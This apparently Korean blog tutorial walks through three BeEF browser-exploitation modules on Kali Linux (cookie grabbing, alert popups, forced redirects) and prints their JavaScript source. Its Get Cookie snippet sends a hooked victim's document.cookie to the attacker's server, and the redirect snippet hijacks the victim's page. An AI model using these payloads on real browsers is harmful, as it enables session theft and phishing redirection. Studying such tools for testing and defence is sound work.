BeEF On Kali Linux - Commands탭 Hooked Domain 카테고리

Browser 카테고리는 현재 Hooked Browser (좀비PC)를 이용해서 정보를 수집하는 모듈 위주로 구성되어 있는 반면에, 하위에 존재하는 Hooked Domain 카테고리는 정보 수집 보다는 무엇인가를 동작 하는 모듈 위주로 구성되어 있다. BeEF 0.4.4.5-alpha 기준으로 Hooked Domain 카테고리는 20개의 모듈이 존재한다.

1. Get Cookie

Get Cookie 모듈은 Hooked Browser의 현재 페이지에서 세션 쿠키를 가져오는 모듈이다.

Get Cookie 모듈을 사용하기 위해서는 Commands 탭에서 Browser 카테고리 하위에 존재하는 Hooked Domain 카테고리에서 Get Cookie를 선택한다. Get Cookie 모듈을 선택하면, 오른쪽 하단에 [Execute] 버튼이 활성화 된다.

[Execute] 버튼을 클릭하면, [Module Results History]에 아래와 command가 생성된다. 

생성된 command를 클릭하면, 모듈의 command가 실행되어 아래와 같이 Get Cookie 모듈의 결과인 세션 쿠키(Cookie)값을 확인 할 수 있다.

아래는 Get Cookie 모듈의 command 소스코드이다. 소스코드 에서도 확인 할 수 있듯이, 페이지의 쿠키를 수집은 document.cookie의 기능을 사용하여 수집한다.

beef.execute(function() {           beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);   });

2. Create Alert Dialog

Create Alert Dialog 모듈은 텍스트를 대화상자에 표시하여 Hooked Browser 화면에 띄우는 모듈이다.

Create Alert Dialog 모듈을 사용하기 위해서는 Commands 탭에서 Browser 카테고리 하위에 존재하는 Hooked Domain 카테고리에서 GCreate Alert Dialog 를 선택한다. Create Alert Dialog 모듈을 선택하면, 대화상자에 표시될 텍스트를 입력하는 폼(Alert text)과 오른쪽 하단에 [Execute] 버튼이 활성화 된다.

Alert text 폼에 텍스트 문자를 입력 한 후 [Execute] 버튼을 클릭하면, [Module Results History]에 아래와 command가 생성된다. 

생성된 command를 클릭하면, 모듈의 command가 실행되어 아래와 같이 Create Alert Dialog 모듈의 결과를 확인할 수 있다. 

Hooked Browser에서는 아래와 같이 Alert text 부분에 입력한 내용이 팝업되어 출력된다.

아래는 Create Alert Dialog 모듈의 command 소스코드이다.  소스코드 에서도 확인 할 수 있듯이, alert을 이용하여 텍스트를 대화상자에 표시하여 Hooked Browser 화면에 띄운다.

beef.execute(function() {         alert("<%== format_multiline(@text) %>");           beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%== format_ multiline(@text) %>"); });

3. Redirect Browser

Redirect Browser 모듈은 Redirect URL 폼에 입력한 URL로 Hooked Browser의 실행되고 있는 웹 페이지를 강제로 리다이렉트(Redirect) 시키는 모듈이다. 

Redirect Browser 모듈을 사용하기 위해서는 Commands 탭에서 Browser 카테고리의 Redirect Browser 선택한다. Redirect Browser 모듈을 선택하면, 오른쪽에 리다이렉트 시킬 URL을 입력하는 폼과 하단에 [Execute] 버튼이 활성화 된다.

 

Redirect URL 폼에 리다리렉트 시킬 URL을 입력 한 후, [Execute] 버튼을 클릭하면, [Module Results History]에 아래와 command가 생성된다. 

생성된 command를 클릭하면, 모듈의 command가 실행되어 아래와 같이 Redirect Browser 모듈의 결과를 확인할 수 있다. 

위 그림과 같이 결과가 나타나면, Hooked Browser의 실행되고 있는 웹 페이지 강제로 리다리렉트된다.

아래는 Redirect Browser 모듈의 command 소스코드이다. 스코드 에서도 확인 할 수 있듯이, window.location 을 이용하여 웹 페이지를 리다리렉트 시킨다.

beef.execute(function() {          window.location = "<%= @redirect_url %>";         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Redirected to:  <%= @redirect_url %>');  });

관련글 보기  2013/11/08 - [Kali Linux/도구 분석 ] - BeEF On Kali Linux - Commands탭 Social Engineering 카테고리  2013/11/08 - [Kali Linux/도구 분석 ] - BeEF On Kali Linux - Commands탭 Persistence 카테고리  2013/11/07 - [Kali Linux/도구 분석 ] - BeEF On Kali Linux - Commands탭 Browser 카테고리